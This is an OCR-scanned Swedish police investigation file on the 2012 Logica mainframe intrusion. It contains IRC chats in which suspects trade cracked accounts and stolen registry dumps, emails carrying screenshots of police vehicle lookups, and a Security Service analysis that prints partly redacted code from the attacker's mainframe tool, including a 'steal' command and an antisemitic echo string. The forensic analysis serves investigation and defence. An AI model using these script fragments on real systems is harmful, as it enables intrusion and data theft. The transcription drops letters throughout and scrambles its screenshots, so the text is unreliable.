Tilläggsprotokoll. till 0201-K Beslag Målsägande vill bli underrättad om tidpunkt för huvudförhandlingen

Storlek: px
Starta visningen från sidan:

Download "Tilläggsprotokoll. till 0201-K81864-12. Beslag Målsägande vill bli underrättad om tidpunkt för huvudförhandlingen"

Transkript

1 Plismyndighet Stckhlms län Enhet LU/IT!T-frensisk sektin Handläggare (Prtkllförare) Kriminalinspektör Olle Wahlström Undersökningsledare Kammaråklagare Henrik Olin Plisens diarienummer 0201-K Förtursmål l Nej Ersättningsyrkanden Tilläggsprtkll till 0201-K Aklnr AM Signerat av Signerat datum Datum Beslag Målsägande vill bli underrättad m tidpunkt för huvudförhandlingen Nej Tlk krävs Misstänkt {Efternamn ch förnamn) Persnnummer Svarthlm W arg, Per Gttfrid Brtt Underrättelse m utredning enligt RB 23:18 Underrättelse Yttrande Underrättelse Underrättelsesätt, misstänkt utsänd senast slutförd Försvarare Salmnsn, Ola, förrdnad Underrättelsesätt, försvarare Resultat av underrättelse mt l Resultat av underrättelse försv Misstänkt (Efternamn ch förnamn) Persnnummer Gustafssn, Brr OlfMathias Brtt Underrättelse m utredning enligt RB 23:18 Underrättelse Yttrande Underrättelse Underrättelsesätt, misstänkt utsänd senast slutförd Försvarare Begärd, Hurtig, Björn Underrättelsesätt, försvarare Resultat av underrättelse mi l Resultat av underrättelse försv Utredningsuppgifter/Redvisningshandlingar Diarienr Uppgiftstyp Sida Tilläggsprtkll 2 Rapprt Riksplisstyrelsen 0201-K Rapprt Sammanfattning knsekvenser Riksplisstyrelsen... l PM PM Gällande kmmunikatin... 4 PM sammanfattning av innehåll i e-pst PM Analys av filen utcam.sh

2

3 Film Övrigt Film från Kambdja, D VD-skiva Persnalia Bilaga skäligen misstänkt, Gustafssn, Brr OlfMathias 21 Persnalia, Gustafssn, Brr OlfMathias 22 Bilaga skäligen misstänkt, Svarthlm W arg, Per Gttfrid 23 Persnalia, Svarthlm W arg, Per Gttfri d

4

5 Rapprt Sammanfattning knsekvenser Riksplisstyrelsen, :35 diarienr: 0201-K Plisen Riksplisstyrelsen HK/VLK Verksamhetsskyddsenheten Anders J ared Säkerhetsspecialist/ Krinsp. Rapprt Datum Diarienr (åberpas) HD- VLK 9/12 Saknr Sammanfattning särskild händelse Mrgan Händelse Den 6 mars 2012 uppdagades tecken på dataintrång hs företaget Lgica. Den 22 mars 2012 anmäldes det pågående dataintrånget till Plisen. Flera myndigheters, inkl. Riksplisstyrelsens, verksamhet baseras på den infrmatin sm finns lagrad hs företaget. Persnuppgifter inkluderat även känsliga ch skyddade persnuppgifter röjdes. Omfattning Dataintrångets mfattning var från början känd ch hanterades därför med förutsättningen att all infrmatin hs företaget var röjd. Ganska snart kunde knstateras att en str mängd infrmatin kpierats ch att åtminstne ca l O 000 spärrmarkerade persnuppgifter förts ut ur Lgicas strdatrmilj ö. Initialt var farhågrna att alla persnuppgifter sm hanteras inm Plisen ptentiellt var förändrade ch därför brukbara. Efter nggrann analys framkm dck att de persnuppgifter sm hanteras inm Plisen frtfarande var tillförlitliga. Händelsen km att beröra stra delar av Plisen ch samverkande myndigheter då skyddade persnuppgifter röjts. Ett mfattande arbete med att minimera skadrna för persner med skyddade persnuppgifter ch it-system samt att säkerställa tillförlitligheten till befmtliga uppgifter genmfördes. Aktiviteter Behvet av samrdning ch krdinering för att öka effektiviteten i arbetet var kritisk. Händelsen bedömdes falla utanför Säp:s ansvarsmråde ch RPS Verksamhetsskydd tg samrdningsansvaret för incidentarbetet Alla berörda inm RPS, skatteverket ch Krnfgdemyndigheten infrmeras m incidenten. Ett gemensamt strmöte med representanter från alla berörda myndigheter ch företag genmfördes den 23 mars för att rganisera incidentarbetet Vid mötet deltg ca 40 persner. Arbetet rganiserades i undergrupper för hantering av lika ämnesmråden. Varje myndighet, ch i vissa grupper även företag, fanns representerade med minst en persn i varje undergrupp. De följande veckrna innebar incidentarbetet i strt sett heltidsarbete för en str mängd av de invlverade persnerna. För RPS del var flera lika avdelningar starkt invlverade bl. a Rikskriminalplisen, Verksledningskansliet, Sammanfattning knsekvens RPS.dcx

6

7 Rapprt Sammanfattning knsekvenser Riksplisstyrelsen, :35 diarienr: 0201-K Riksplisstyrelsen Plisavdelningen, Plisens Verksamhetsstöd, Rikskmmunikatinscentralen, Kmmunikatinsavdelningen ch säkerhetsplisen. Händelsen bedömdes vara av så allvarlig art att Riksplischefen den 28 mars 2012 beslutade m natinell särskild händelse enligt Förrdning (1989:773) med instruktin för Riksplisstyrelsen för att samrdna plisens uppgifter ch samverka med externa myndigheter mt bakgrund av dataintrånget hs skatteverkets leverantör. Den 28 mars 2012 fattade Rikskriminalplischefen beslut m att stab skulle upprättas med anledning av den allvarliga händelsen. stabsrientering med samtliga invlverade hölls vid åtta tillfällen. Arbetet i undergrupperna hade lika fkus. Främsta inriktning initialt var att avbryta intrånget ch :fa kunskap m mfattningen. När det framgick att enskilda persners säkerhet kunde vara i fara skapades en undergrupp för att minimera riskerna, infrmera ch skydda medbrgarna. Denna grupp invlverade bl. a pliser i hela landet med kntaktansvar för skyddade persner i samarbete med skatteverket. Den 4 april avslutades den akuta fasen då intrånget hade stppats ch de medelbara knsekvenserna var kartlagda. Incidenthanteringsarbetet övergick då i en arbetsfas. Arbetsfasen pågick fram till 15 nvember 2012 då myndigheterna gemensamt beslöt att man kunnat säkra it-miljön ch stänga möjligheterna för nya liknande angrepp. Resterande åtgärder sm kvarstår bedömdes ligga inm varje myndighets eget linjearbete att hantera. Arbetet frtgår. Kstnadsberäkning Kstnadsberäkning är gjrd för RPS. Övriga myndigheter ch företags kstnader är ej inkluderade. Inga kstnader sm är kpplade till den plisiära förundersökningen är således inkluderade i den presenterade kstnadsberäkningen. Beräkningen hänför sig enbart till det arbete sm lagts ner inm RPS på att hantera incidenten ch att säkerställa att den infrmatin (relaterad till intrånget) sm Plisen använder sig av går att lita på. Kstnadsberäkningen är inte kmplett då redvisningen arbetad tid inte sammanställs på inträffade incidenter till skillnad från plisiära utredningar. Det redvisade belppen ligger således i underkant mt verklig kstnad. Kstnaden är baserad på den samma schablnkstnad sm debiteras ex. bevakning av idrttsevenemang. Schablnen är 920 kr/arbetad timma. Sammanställning av kstnader uppdelat på avdelning: Avdelning Summa RPS Verksamhetsskydd ,00 kr RPS Kmmunikatinsavd. Ingen uppgift RPS/RKP Delsumma ,00 kr RPS/PVS ,00 kr RPS Systemägare Ingen uppgift SÄPO ,00 kr RPS Stab Uppskattad ,00 kr

8

9 Rapprt Sammanfattning knsekvenser Riksplisstyrelsen, :35 diarienr: 0201-K Riksplisstyrelsen HK Ledning PVS Ledning Stab Återstående arbete Uppskattad Ttalt ,00 kr Ingen uppgift ,00 kr ,00 kr Intrångets knsekvens för RPS kan knstateras vara att det medfört en avsevärd kstnad sm kunnat användas till medbrgarnas nytta på ett betydligt bättre sätt. Tiden sm lagts ner på incidentarbetet från en str mängd persner inm RPS har försenat annat högt pririterat arbete. Anders J ar ed

10

11 diarienr: 0201-K Plisen Plismyndigheten i Stckhlms län Länskriminalplisavdelningen IT-frensiska sektinen Jakim Perssn IT-frensiker PM Datum Diarienr (åberpas vid krresp) 0201-K Gällande kmmunikatin Mathias Gustafssn, alias dirox I material sm inhämtats hs passagen. se återfanns ett antal textfiler vilka innehåller sparade chatknversatiner sm skett via IRC. Av ttalt 1967 mttagna meddelanden kmmer 679 från användaren tlt sm får antas vara Gttfrid Svarthlm W arg. Så gtt sm all chat handlar m intrånget mt Lgica. Nedan följer utdrag ur chatten: : : : : : : : : :56 <tlt> <tlt> <tlt> <tlt> <tlt> de ar sa JA VLA AGDA j såg inte at du skrev, vad var det j ag laddade ner? deras racf-db tank /etc/passwd :P well shadw h ah unerbart : : : : : : : :15 vill du ha ett par inftrgkntn :) sisadar 70k st :) japs ge mig j ag har bara 200 =) har du nå plisknn,? skulle vilja se hur dm såg ut laddar du upp dm nånstans? : : : : :23 typ 128k kntn ttalt hade krakkat 70k senast jag kllade :) fan va nice =) duktig apa : sen har jag kmpletta dumpar av bl.a. fgdens register PM Gällande kmmunikatin.dcx

12

13 PM Gällande kmmunikatin, :38 diarienr: 0201-K Plismyndigheten i Stckhlms län K :24 <tlt> :24 <tlt> <tlt> sen har jag kmpletta dumpar av bl.a. fgdens register bara fgden e 12GB haha : : : : :30 <tlt> :30 <tlt> jag vill ha derazs register ska du inte ha lite pengar fran fgden x :) jp =) av ngn anledning trr jag att det e en dalig ide. frsta ar battre maste rdna narrstans du kan dra fran bara :26 <t L t> :26 <tlt> : : :27 SPAR ligger ju inte hs inftrg/sema!lgica langre! :D daremt gr KFMs register det (REX).. du sag att jag sntt hela? jag packade upp allt idag, sitter ch krypteraqr det nu håller på att säkra det säkra på Japtppen vill du ha allt det jag har sen? vet inte m vi har lika I materialet påträffades utöver knversatinerna med Svarthlm W arg även chat med Smedlund, se utdrag nedan : :53 <S Plg,gl> :53 <sii:qtgg]> :53 <snggl> :53 <SRqggl> :53 <SDl;tgci> : : : : : : : : :54 vill du ha några kntn till inf? näätack har samma sm du redan vi sm krackat dm vettvettyvetty=) j men snacka inte så mkt m det på efnet inte krypterat här lär vara lggat =P är du inte på tnet? j krs där nej på widepenbsd =)aha, jag trdde det var jag ch anaapa sm samarbetat japps är kvar i se

14

15 PM Gällande kmmunikatin, :38 diarienr: 0201-K Plismyndigheten i Stckhlms län K Krisffer Smedlund, alias snuggle ch krs I Smedlunds datr med beslagsnummer BG påträffades två filer benämnda ut.txt ch ut2.txt. Filerna innehåller råa flkbkföringsuppgifter för Gttfrid Svarthlm W arg ch Fredrik Neij tagna från Lgicas system. I förhör kan Smedlund inte påminna sig ha sett dessa uppgifter utan menar att det pstas så mycket i IRC kanalen. Gttfrid Svarthlm W args, alias Anakata ch tlt I Svarthlm W args datr med beslagsnummer BG påträffades str mängder chatknversatiner sm skett via IRC. Det finns dck stra luckr i materialet men man ser att Svarthlm W arg de fact använder sig av användamamnet tlt ch att han uppehåller sig i IRC kanalen hack.se. Kppling till hack.se Så gtt sm all kmmunikatin, mellan Svarthlm W arg, Gustafssn ch Smedlund, har skett eller sker genm IRC kanalen hack.se. Där diskuterar man relativt öppet dataintrång ch "alla" vet vad sm pågår, är inblandade i någn del eller har överseende med det sm sker. Jakim Perssn Tel: , jakim. pers se

16

17 PM sammanfattning av innehåll i e-pst, :21 diarienr: 0201-K Plisen Bilaga Datum Plismyndigheten i Stckhlms län Länskriminalplisavdelningen IT-frensiska sektinen Diarienr (åberpas vid krresp) 0201-K l (7) Sammanfattning avepst i BG avseende bilar Bilder från Inftrg med slagningar på bilar tillhörande rättsvårdande myndigheter förekmmer i två epst meddelande. Dels skickat till fredagen den 15:e ktber :39: ch dels nsdagen den 20:e ktber :19: se nedan. Frm: T: Subject: Mathias Gustafssn bilar Sent: Fri, 15 Oct :39: Sökväg: /hme/luciddream/. thunderbird/af1 wcun. default/imapmail/ imap.ggl .cm/[gmail].sbd/sent Mail bilar [--Mime Part, Type: image/jpeg; name="avesta01.jpg", Disp: attachment; filename="avesta01.jpg", Size: 139KB --] [--Mime Part, Type: image/jpeg; name="brlnge01.jpg", Disp: attachment; filename*=utf- 8"%62%6F%72%6C%C2%84%6E%67%65%30%31 %2E%4A%50%47, Size: 169KB --] [--Mime Part, Type: image/jpeg; name="falun01.jpg", Disp: attachment; filename="falun01.jpg", Size: 160KB --] [--Mime Part, Type: image/jpeg; name="falun02.jpg", Disp: attachment; filename="falun02.jpg", Size: 190KB --] [--Mime Part, Type: image/jpeg; name="hktet_falun01.jpg", Disp: attachment; filename*o*=utf- 8''%68%C2%84%6B% 74%65% 74%5F%66%61 %6C%75%6E%30%31 %2E%4A%50; filename*1 *=%47, Size: 113KB --] [--Mime Part, Type: image/jpeg; name="hktet_hrnsand01.jpg", Disp: attachment; filename*o*= UTF- 8"%68%C2%84%6B%74%65%74%5F%68%C2%84%72%6E%C2%94%73%61%6E; filename*l *=%64%30%31 %2E%4A%50%47, Size: 108KB --] [--Mime Part, Type: image/jpeg; name="kva_gruvberget01.jpg", Disp: attachment; filename="kva_gruvbergetol.jpg", Size: 137KB --] [ --Mim e Part, Type: image/jpeg; name="kva_hall01.jpg", Disp: attachment; filename="kva_hall01.jpg", Size: 140KB --] [--Mime Part, Type: image/jpeg; name="kva_tillberga01.jpg", Disp: attachment; filename="kva_tillberga01.jpg", Size: 114KB --] [--Mime Part, Type: image/jpeg; name="kva_viskan.jpg", Disp: attachment; filename="kva_viskan.jpg", Size: 125KB --] [ --Mi me Part, Type: image/jpeg; name="kvm_vsterts.jpg", Disp: attachment; filename*=utf- 8"%68% 76%6D%5F% 76%C2%84% 73%74%65% 72%C2%86% 73%2E%4A%50%4 7, Size: 108KB --] [ --Mi me Part, Type: image/jpeg; name="ludvika01.jpg", Disp: attachment; filename="ludvika01.jpg", Size: 131KB --] [--Mime Part, Type: image/jpeg; name="malung01.jpg", Disp: attachment; filename="malung01.jpg", Size: 154KB --]

18

19 PM sammanfattning av innehåll i e-pst, :21 diarienr: 0201-K Plismyndigheten i Stckhlms län K [--Mime Part, Type: image/jpeg; name="mraol.jpg", Disp: attachment; filename="mraol.jpg", Size: 160KB --] [--Mi me Part, Type: image/jpeg; name="ngelhlmol.jpg", Disp: attachment; filename*=utf- 8"%C2%84%6E%67%65%6C%68%6F%6C%6D%30%31 %2E%4A%50%47, Size: 115KB --] [--Mi me Part, Type: image/jpeg; name="rttvik.jpg", Disp: attachment; filename*=utf- 8"%72%C2%84%74%74%76%69%6B%2E%4A%50%47, Size: 127KB --] [--Mime Part, Type: image/jpeg; name="vstersol.jpg", Disp: attachment; filename*=utf- 8"%76%C2%84% 73%74%65% 72%C2%86% 73%30%31 %2E%4A%50%47, Size: 160KB --] [--Mime Part, Type: image/jpeg; name="vsters02.jpg", Disp: attachment; filename*=utf- 8"%76%C2%84%73%74%65%72%C2%86%73%30%32%2E%4A%50%47, Size: 196KB --] [--Mi me Part, Type: image/jpeg; name="vsters03.jpg", Disp: attachment; filename*=utf- 8"%76%C2%84%73%74%65%72%C2%86%73%30%33%2E%4A%50%47, Size: 199KB --] [--Mime Part, Type: image/jpeg; name="vsters04.jpg", Disp: attachment; filename*=utf- 8"%76%C2%84%73%74%65%72%C2%86%73%30%34%2E%4A%50%47, Size: 194KB --] X-Mzilla-Status: 0001 X-Mzilla-Status2: Return-Path: Received: frm [ ] (h a27l.priv.bahnhf.se [ ]) by mx.ggle.cm with ESMTPS id q54sm eeh (versin=sslv3 cipher=rc4-mds); Fri, 15 Oct :39: (PDT) Message-ID: User-Agent: MIME-Versin: 1.0 Mzilla/5.0 (Xll; U; Linux i686; en-us; rv:l ) Geck/ Thunderbird/3.0.8 Cntent-Type: multipart/mixed; bundary=" " Frm: T: Subject: Mathias Gustafssn bilar Sent: Wed, 20 Oct :19: Sökväg: /hme/lucidd rea m/. thunderbird/af1 wcun. default/imapmail/ imap.ggl .cm/[gmail].sbd/sent Mail bilare [ --Mi me Part, Type: image/jpeg; name="kvm_v,.sterts.jpg", Disp: attachment; filename*=utf- 8"%6B% 76%6D%5F% 76%C2%84% 73%74%65%72 %C2%86% 73%2E%4A%50%4 7, Size: 108KB --] [--Mime Part, Type: image/jpeg; name="h,.ktet_h,.rn"sandol.jpg", Disp: attachment; filename*o*=utf- 8"%68%C2%84%6B%74%65%74%5F%68%C2%84%72%6E%C2%94%73%61%6E; filename*1 *=%64%30%31 %2E%4A%50%47, Size: 108KB --] [ --Mim e Part, Type: image/jpeg; name="h,.ktet_falunol.jpg", Dis p: attachment; filename*o* = UTF- 8''%68%C2%84%6B% 74%65% 74%5F%66%61 %6C% 75%6E%30%31 %2E%4A %50; filename*1 *=%47, Size: 113KB --] [--Mime Part, Type: image/jpeg; name="kva_tillbergaol.jpg", Disp: attachment; filename="kva_tillbergaol.jpg", Size: 114KB --] [ --Mi me Part, Type: image/jpeg; name=",.ngelhlmol.jpg", Disp: attachment; filename*=utf- 8"%C2%84%6E%67%65%6C%68%6F%6C%6D%30%31 %2E%4A%50%47, Size: llskb --] [--Mime Part, Type: image/jpeg; name="kva_viskan.jpg", Disp: attachment; filename="kva_viskan.jpg", Size: 125KB --] [--Mime Part, Type: image/jpeg; name="r,.ttvik.jpg", Disp: attachment; filename*=utf- 8"%72%C2%84%74%74%76%69%6B%2E%4A%50%47, Size: 127KB --] [--Mime Part, Type: image/jpeg; name="ludvika01.jpg", Disp: attachment; filename="ludvika01.jpg", Size: 131KB --] [ --Mim e Part, Type: image/jpeg; name="kva_gruvberget01.jpg", Dis p: attachment; filename="kva_gruvberget01.jpg", Size: 137KB --] [--Mime Part, Type: image/jpeg; name="avestaol.jpg", Disp: attachment; filename="avestaol.jpg", Size: 139KB --]

20

21 PM sammanfattning av innehåll i e-pst, :21 diarienr: 0201-K Plismyndigheten i Stckhlms län K [--Mime Part, Type: image/jpeg; name="kva_haiiol.jpg", Disp: attachment; filename="kva_haiiol.jpg", Size: 140KB --J [--Mime Part, Type: image/jpeg; name="malung01.jpg", Disp: attachment; filename="malungol.jpg", Size: 154KB --J [--Mi me Part, Type: image/jpeg; name="mraol.jpg", Disp: attachment; filename="mraol.jpg", Size: 160KB --J [--Mi me Part, Type: image/jpeg; name="v,stertsol.jpg", Disp: attachment; filename*=utf- 8"%76%C2%84%73%74%65%72%C2%86%73%30%31%2E%4A%50%47, Size: 160KB --J [--Mime Part, Type: image/jpeg; name="falunol.jpg", Disp: attachment; filename="falunol.jpg", Size: 160KB --J [--Mime Part, Type: imagejjpeg; name="brl,ngeol.jpg", Disp: attachment; filename*=utf- 8"%62%6F%72%6C%C2%84%6E%67%65%30%31 %2E%4A%50%47, Size: 169KB --J [--Mime Part, Type: imagejjpeg; name="falun02.jpg", Disp: attachment; filename="falun02.jpg", Size: 190KB --J [--Mi me Part, Type: image/jpeg; name="v,sterts04.jpg", Disp: attachment; filename*=utf- 8"%76%C2%84%73% 74%65% 72%C2%86% 73%30%34%2E%4A%50%47, Size: 194KB --J [--Mime Part, Type: imagejjpeg; name="v,sterts02.jpg", Disp: attachment; filename*=utf- 8"%76%C2%84%73%74%65%72%C2%86%73%30%32%2E%4A%50%47, Size: 196KB --J [--Mime Part, Type: image/jpeg; name="v,sterts03.jpg", Disp: attachment; filename*=utf- 8"%76%C2%84%73%74%65%72%C2%86%73%30%33%2E%4A%50%47, Size: 199KB --J X-Mzilla-Status: 0001 X-Mzilla-Status2: Return-Path: Received: Message-ID: U ser-agent: MIM E-Versin: Cntent-Type: frm [ J (h a271.priv.bahnhf.se [ ]) by mx.ggle.cm with ESMTPS id q51sm eeh (versin=sslv3 cipher=rc4- MD5); Tue, 19 Oct :19: (PDT) <4CBE2784. > Mzilla/5.0 (Xll; U; Linux i686; en-us; rv: ) Geck/ Thunderbird/ multipart/m ix ed; bundary= " " Till båda dessa e-pst meddelanden är 20 bildfiler bifgade föreställande skärmdumpar från slagningar på inftrgs webbtjänst. Detta är samma bilder sm har påträffats i materialet inhämtat från Ubuntu One ch sm beskrivs under rubriken " Skärmdumpar plisen" i analysprtkllet för det samma. Nedan följer tre exempel ur dessa bifgade filer.

22

23 avestao l.jpg Eile dit!dew Hi try fil<marks Ils <Cf https://www5.1nftrg.se/infbi l/frameorgnr.jsp h met (/l Ol 3 3 Ol :J 00 :::: Reg /Org /Persnnr l Körkrt l Chassinr Skning Frdns innehav.. Frdnsinnehav Ägare Saluvagntfinnehav Huvudkntr l fllial Adresser :J :J cc Ol < :J :J <D ::f' Ol Nv söknmg Utskrift <D - (/l N fi!j!iiiiiimii! l POLISMYNDIGHETEN DALARNA BOX 739/NÄPO OMR. AVESTA FALUN LKF: Ägarkategri: staten... w l -"'"... l (j) Antal hämtade frdn: 11 Frdnsslag S P Antal status Antal Antal Ägerrll N iii" [ Dne /t startl Inrbil- Mzilla FirerM '\1 kva_visklln.jpg- Paint lirsm. Frdnsslag status SLÄP Beatrice- Cnversatian l FJ l i) Der Dank [Discschlac... l Cnversatian l Nielas... Ägarrll (i)' :J :: N... l :A CP... CP (j) -"'"... l N Cnversatian l Hi Way Technlgy C... l $ Windws Messenger ->.

24 r l ( ( (

25 brlngeo l.jpg ""' s: Ul Ql 3 3 Ql :J Di' Chassinr Reg /Org /Persnnr l Körkrt l Skntng F rdns innehav Frdnsinnehav saluvagnsinnehav Huvudkntr / fili l AdNsser :::+ :J :J cc Ql < :J :J CD ::r Q) Ägare Ny sökmng Utskrift POLISMYNDJGHETEN DALARNA BOX 739 /NÄPO OMR.BORLÄNGE FALUN LKF: Ägarkategri: staten CD "O l N... w l Antal hämtade frdn: 21 Frdnsslag Antal status Antal Ägarrll l Antal... (j) l SLÄP Beatrlce Cnversatian falun02. JP G Paint N Ärsm. Frdnsslag status SLÄP j l: Cnversatian l iij Dcument- WrdPad FJ- a. Ägarrll Nielas Cnversatian D.. ili'... (O' :J :: N... c:... c: (j) l... N J Ql Hi Way Technly- C... l Windws Messenger......

26 ( (

27 faluno l.jpg '(j '1J s: (/) Q) l 1 4-h-met 3 3 Q) :J öi' Reg-/Org-/Persnnr Skmng t Frdnsinnehav saluvagnsinnehav Huvudkntr l filial Adresser l Körkrt :::::: :J :J cc Q) < :J :J CD ::r Qt l Chasslnr Ny s O k n i nq Frdns innehav Ägare Utskrift CD "C (/) l POLISMYNDIGHETEN DALARNA BOX 739/NÄPO OMR. FALUN FALUN LKF: Ägarkategrl: Staten -- N... w l.j:>. l... Q) Antal hämtade frdn: 50 Frdnsslag... Antal 33 SLÄP 7 MC 6 L stbil 4 status Antal Ägarrll r-:, Antal 1 Avstäl l d Qi'... Ärsm. Frdnsslag status 2007 I tr fik 2007 I tr fik Lastbil 1971 SLÄP MC 1964 MC 1984 MC 1984 MC 1999 Lastbil SLÄP 1990 SLÄP 1972 SLÄP 2007 SLÄP SLÄP (ii' :J :: N Ägarrll... CX>... CX> Q).j:>. l... N Dne lf,tstartl Infbll- Mzllla FlrefK [jl New Message l Be trlce- Cnvers tin lj untried - Palnt l Cnversatian lli'j Dcument - WrdP d FJ- l Ni c l s - Cnversatian l HI W y Technlgy- C l - Windws Messenger... -" N

28 ( \ ( (

29 PM Analys av filen utcam.sh, :32 diarienr: 0201-K SÄKERH ETSPOLISEN Infrmatinssäkerhetsenheten PM Datum Diarienr 13 1 (7) Analys av filen utcam.sh Bakgrund Angriparen har successivt utvecklat sina attackmetder i syfte att strukturera ch förenkla sitt arbete. I beslag BG E01/Partitin 7/ återfinns en fil med namnet "utcam.sh". Nedan redvisas översiktligt innehållet i denna fil. Delar av filen har tagits brt för att undvika nödig expnering av lp-adresser, tillvägagångssätt ch detaljer i utnyttjade sårbarheter. För att öka läsbarheten av skriptet har ckså tmma rader tagits brt ch några extra radbrytningar tillkmmit. Sammanfattning Angriparen har skrivit ett verktyg för att förenkla sina attacker. Verktyget är i frm av ett så kallat shell-skript med vars hjälp man enkelt kan välja vilken server man ska angripa ch vad man vill åstadkmma med attacken. Shell-skriptet utnyttjar en av de sårbarheter sm angriparen funnit ch är avancerat ch väl strukturerat. Ett exempel på kmmand sm kan ges till skriptet är "steal". Kmmandt används till exempel då man önskar stjäla viss specificerad infrmatin på strdatrn.

30 PM Analys av filen utcam.sh, :32 diarienr: 0201-K säkerhetsplisen PM 14 2 (7) Analys Filen är vad man brukar benämna ett shell-skript1 Förenklat kan man beskriva ett shell-skript sm en serie kmmandn man önskar att datrn ska utföra sekventiellt. I denna analys ges en beskrivning av shell-skriptets funktin. Detta för att skildra angriparens intentin ch kapacitet. Beskrivningarna ges direkt efter utvalda kdsegment. Kdsegmenten följer ftlens struktur från början till slut ch sm tidigare nämnts har delar av kden tagits brt. Delar av kden har ckså färgmarkerats för att tydliggöra några viktiga delar. #!/bin/bash h=" IP-adress annan strdatr" Högst upp i ftlen specificerar angriparen ett antal lp-adresser. Dessa har i detta PM bytts ut mt en beskrivande text. Om det är ett #-tecken före en rad i ett shell-skript kmmer denna rad inte att läsas av skriptet. I stycket van ser vi att det är Nrdeas strdatr sm angriparen valt att angripa. Det är dck lätt gjrt att ändra servet så att man i stället angriper ett annat mål genm att flytta #-tecknet. 1 Från engelskans shell script 2 Restructured Extended Executr, prgrammeringsspråk utvecklat av IBM

31 PM Analys av filen utcam.sh, :32 diarienr: 0201-K säkerhetsplisen PM 15 3 (7) "Mzilla/5.0 (Windws NT 5.1; x86) AppleWebKit/ (KHTML, like Geck) Chrme/ Safari/535.19" dh=" UT" while :; d ech -n " $dh 8====D " Shell-skriptet frtsätter med att definiera ett antal variabler samt att invänta ett kmmand ch eventuellt annan data från användaren. I resterande del av shell-skriptet kmmer detta kmmand att ha lagrats i variabeln "verb". Verb kan således likställas med valt kmmand. Shell-skriptet innehåller en hel del spårutskrifter. Det är dessa man ftast ser efter kmmandt ech. ech " << $cmdline" if [ -z "$cmdline" ]; then ech " FIN" exit O f i 'ech "$cmdline" lcut -d' ' -fl' arg=' ech "$cmdline" l cut -d' ' -f2-' cmd=" "; pr=" " pst=" " tgt=" " if [ ]; then ech " : ppppp REXX ROXX" >&2 pr=" ech '/* REXX */' > /tmp/rx; ech '' >> /tmp/rx; chrnd 755 /tmp/rx; "; f i pst=" rm -f /tmp/rx "; tgt=" " cmd=" $arg" Shell-skriptet definierar här det första möjliga kmmandt "rx". Om angriparen valt att utföra just kmmandt rx är det på denna plats det bestäms vad kmmandt ska utföra. sekvensen av instruktiner delas upp i lika delar: pr, pst, tgt ch cmd. Detta för att enklare dela upp i vilken rdning kmmandna ska ske ch för att mer strukturerat sätta ihp kmmandt till en helhet i slutet av shell-skriptet. I just det här fallet önskar angriparen kunna skriva ch köra REXX2-kd på strdatrn. 2 Restructured Extended Executr, prgrammeringsspråk utvecklat av IBM

32 PM Analys av filen utcam.sh, :32 diarienr: 0201-K säkerhetsplisen PM 16 4 (7) if "$verb" = " l ; then ech ":ppppp REXX ROXX OUT" >&2 f i Här önskar angriparen utföra samma sak sm i exemplet van, men med den skillnaden att man förväntar sig att REXX-kmmandna prducerar någn frm av utdata sm man är intresserad av. if "$verb" = " l ; then ech ":pppp REXXOPHiLE" >&2 ech " [ $arg l " inputfile='ech "$arg" lcut -d' ' -fl' rest=' ech "$arg" l cut -d' ' -f2-' cmd=' (ech -n "PARMS='${rest}' ;" ; cat $inputfile)' pr=" ech '/* REXX */' > /tmp/rx; ech '1=\" \"; say \"k\" ; ' >> /tmp/rx; chind 755 /tmp/rx; cat /tmp/rx;" ; tgt=" " f i exit O Då kmmandt rxin anges, önskar angriparen köra REXX-kmmandn sm anges via en fil sm ckså tillhandahålls av angriparen. if [ "$verb" = " " l; then ech ":pppp REXXOPHiLE" >&2 ech " [ $arg l " inputfile='ech "$arg" lcut -d' ' -fl' rest='ech "$arg" lcut -d' ' -f2-' cmd=' (ech -n "PARMS='${rest}';" ; cat $inputfile)' fi pr=" "; tgt=" " Detta är en kmbinatin av de två tidigare beskrivna kmmandna rxut ch rxin. if [ "$verb" = " " l; then ech ":pppppp SHELL SHOCK" >&2 f i tgt=" /bin/sh" cmd=" $arg" Syftet med kmmandt sh är att köra ett kmmand/prgram i USS 3 -delen (UNIX-delen) av strdatrn. Till exempel kanske man är intresserad av hur katalgstrukturen ser ut eller vilka prcesser sm körs. 3 UNIX System Services, en kmpnent i z/os sm används i IBM:s strdatr

33 PM Analys av filen utcam.sh, :32 diarienr: 0201-K säkerhetsplisen PM 17 5 (7) if [ "$verb" l; then ech ":PppPPP PHILE SHOCK" >&2 ech " [ $arg ] " inputfile='ech "$arg" lcut -d' ' -fl' f i cmd=$ (cat $inputfilelsed 's/\xod//g') Kmmandt shin gör samma sak sm kmmandt sh, men med skillnaden att man läser instruktiner från en angiven fll. if [ "$verb" = " " l; then ech ":PpppPP SHYLOCK THE JEWISH THIEF STEALiNG TO gl" >&2 cmd=" rm -fr /tmp/sl; cd /tmp; mkdir /tmp/sl; mkdir /tmp/sl/$arg; cp -c > /tmp/sl/${arg}.raw.z; tgt=" " ech " [ $cmd l" f i -r \"//'$arg'\" /tmp/sl/$arg/; cat \"//'$arg'\" l Kmmandt "steal" är eventuellt självförklarande. Här har angriparen för avsikt att stjäla någt sm han själv anger. Shell-skriptet ser ckså till att kmprimera (packa ihp) infrmatinen sm angriparen har valt att stjäla, innan den läggs i en katalg på strdatrn sm är möjlig för angriparen att kmma åt.

34 PM Analys av filen utcam.sh, :32 diarienr: 0201-K säkerhetsplisen PM 18 6 (7) if [ "$verb" = 1 1 ] ; then 4096\"; e eh " : PppPPp VOLUME GOES TO 11" >&2 pr=" ech 1/* REXX */1 > /tmp/rx; ech 1address syscall \"read O tgt=" Il s cmd=" ${cmd}address ts \"allcate ddname (sysprint) sysut\"; address ts \"allcate ddname (sysin) dummy\" ; " fr vl in $arg ; d cmd=" ${cmd}address ts \"allcate dsname (1FORMAT4.DSCB1) DDNAME (SYSLIB) SHR UNIT (3390) VOLUME (${vl}) KEYLEN (44) DSORG (DA) EROPT (ACC)\" ; " cmd=" ${cmd}address ts \"TSOEXEC CALL * \" ; address ts \"REPRO INFILE (SYSLIB) OUTFILE (utdd)\"; " dn e f i ech " [ $cmd ] " Det är en någt mer avancerat peratin sm kmmandt vl utför. Shell-skriptet använder sig utav AMASPZAP, ett prgram på strdatrn sm har många användningsmråden. I detta fall trr vi att angriparen skapar sig en förteckning över tillgängliga dataset på en specifik vlym i strdatrn. if [ "$verb" = " " ] ; then ech ":PppPP TSlOw SHOCK" >&2 cmd=' ech "$arg" 1 sed 1 s/; /\n/g 1 ' fi På samma sätt sm angriparen kan köra ett kmmand/prgram i USS-delen kan han med hjälp av ts-kmmandt välja att köra ett kmmand/prgram mt MVS-delen istället. Härifrån kan man till exempel starta ett batch-jb, köra kmmandn mt RACF eller skapa ett dataset. Vad man kan åstadkmma är berende på användarens 